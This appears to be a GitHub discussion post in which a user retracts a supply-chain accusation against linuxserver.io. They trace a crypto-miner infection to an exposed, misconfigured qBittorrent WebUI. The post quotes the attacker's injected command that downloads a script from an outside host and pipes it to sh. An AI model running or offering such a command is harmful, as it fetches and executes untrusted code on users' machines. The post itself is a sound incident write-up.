Skip to content
Discussion options

You must be logged in to vote

Update + Apology — I was wrong

I want to correct my original post and apologize to the community, and specifically to the linuxserver.io team.

The root cause had nothing to do with SABnzbd, linuxserver.io, or the image update. Several of you pointed me toward the exposed-service hypothesis immediately. You were right, and I should have dug into that before posting a theory that implied a supply-chain compromise.

What actually happened: qBittorrent's WebUI had LocalHostAuth disabled and an overly broad subnet whitelist covering all private IP ranges. An attacker found the exposed API and injected an OnTorrentAdded script that ran: curl http://yify.foo | sh. The miner downloaded and execute…

Replies: 2 comments 9 replies

Comment options

You must be logged in to vote
9 replies
@drizuid
Comment options

drizuid May 21, 2026
Collaborator

@ronoray
Comment options

@aptalca
Comment options

@ronoray
Comment options

Answer selected by drizuid
@opello
Comment options

@j0nnymoe
Comment options

@opello
Comment options

@aptalca
Comment options

Comment options

You must be logged in to vote
0 replies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
5 participants